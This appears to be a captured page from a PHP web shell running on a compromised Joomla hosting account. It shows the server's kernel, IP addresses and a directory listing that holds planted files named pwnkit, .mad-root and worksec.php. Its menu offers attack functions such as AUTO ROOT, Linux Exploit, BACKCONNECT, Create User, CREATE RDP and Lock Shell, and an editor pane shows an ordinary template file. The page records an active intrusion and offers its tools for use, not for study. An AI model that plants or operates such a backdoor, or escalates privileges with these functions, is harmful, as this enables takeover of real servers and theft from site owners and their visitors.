Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
templates /
wavo /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
features
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
headers
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
offcanvas
[ DIR ]
drwxr-xr-x
overrides
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sppagebuilder
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
comingsoon.php
780
B
-rw----r--
component.php
2.6
KB
-rw----r--
en-GB.tpl_wavo.ini
19.04
KB
-rw----r--
error.php
4
KB
-rw----r--
helper.php
3.36
KB
-rw----r--
index.php
19.87
KB
-rw----r--
offline.php
2.75
KB
-rw----r--
options.json
14.51
KB
-rw----r--
options.xml
53.76
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
templateDetails.xml
3.34
KB
-rw----r--
template_preview.png
151.15
KB
-rw----r--
template_thumbnail.png
23.82
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error.php
<?php /** * @package Helix Ultimate Framework * @author JoomShaper https://www.joomshaper.com * @copyright Copyright (c) 2010 - 2021 JoomShaper * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later */ defined ('_JEXEC') or die(); use HelixUltimate\Framework\Platform\Helper; use Joomla\CMS\Factory; use Joomla\CMS\Uri\Uri; use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Text; $app = Factory::getApplication(); $doc = Factory::getDocument(); $template = HelixUltimate\Framework\Platform\Helper::loadTemplateData(); $params = $template->params; $theme_url = Uri::base(true) . '/templates/'. $this->template; /** If SP Page Builder page as a error page is activated- */ /* if ($params->get('error_sppb')) { Helper::renderPage($this->error->getCode(), $params->get('error_sppb_id')); } */ ?> <!doctype html> <html class="error-page" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title><?php echo $this->title; ?> <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></title> <?php if ($favicon = $params->get('favicon')) : ?> <link rel="icon" href="<?php echo Uri::base(true) . '/' . $favicon; ?>" /> <?php else: ?> <link rel="icon" href="<?php echo $theme_url .'/images/favicon.ico'; ?>" /> <?php endif; ?> <?php if(file_exists( \JPATH_THEMES . '/' . $this->template . '/css/bootstrap.min.css' )) : ?> <link href="<?php echo $theme_url . '/css/bootstrap.min.css'; ?>" rel="stylesheet"> <?php else: ?> <link href="<?php echo Uri::base(true) . '/plugins/system/helixultimate/css/bootstrap.min.css'; ?>" rel="stylesheet"> <?php endif; ?> <?php if(file_exists( \JPATH_THEMES . '/' . $this->template . '/css/custom.css' )) : ?> <link href="<?php echo $theme_url . '/css/custom.css'; ?>" rel="stylesheet"> <?php endif; ?> <link href="<?php echo $theme_url . '/css/font-awesome.min.css'; ?>" rel="stylesheet"> <link href="<?php echo $theme_url . '/css/template.css'; ?>" rel="stylesheet"> <?php $preset = $params->get('preset', json_encode(['preset' => 'preset1'])); if (!empty($preset->preset)) { $preset = $preset->preset; } ?> <link href="<?php echo $theme_url . '/css/presets/' . $preset . '.css'; ?>" rel="stylesheet"> </head> <body> <div class="container"> <?php if($params->get('error_logo')) : ?> <a href="<?php echo $this->baseurl; ?>/index.php"> <img class="error-logo" src="<?php echo Uri::base(true) . '/' . $params->get('error_logo'); ?>" alt="<?php echo htmlspecialchars($this->title); ?>"> </a> <?php endif; ?> <h1 class="error-code"><?php echo $this->error->getCode(); ?></h1> <h2 class="error-message"><?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></h2> <a href="<?php echo $this->baseurl; ?>/index.php" class="btn btn-secondary"><span class="fas fa-home" aria-hidden="true"></span> <?php echo Text::_('JERROR_LAYOUT_HOME_PAGE'); ?></a> <?php if ($this->debug) : ?> <div class="error-debug mt-3"> <?php echo $this->renderBacktrace(); ?> <?php if ($this->error->getPrevious()) : ?> <?php $loop = true; ?> <?php $this->setError($this->_error->getPrevious()); ?> <?php while ($loop === true) : ?> <p><strong><?php echo Text::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p> <p><?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></p> <?php echo $this->renderBacktrace(); ?> <?php $loop = $this->setError($this->_error->getPrevious()); ?> <?php endwhile; ?> <?php // Reset the main error object to the base error ?> <?php $this->setError($this->error); ?> <?php endif; ?> </div> <?php endif; ?> </div> <?php if($params->get('error_bg')) : ?> <style> body { background-image: url(<?php echo Uri::base(true) . '/' . $params->get('error_bg'); ?>) } </style> <?php endif; ?> </body> </html>
Close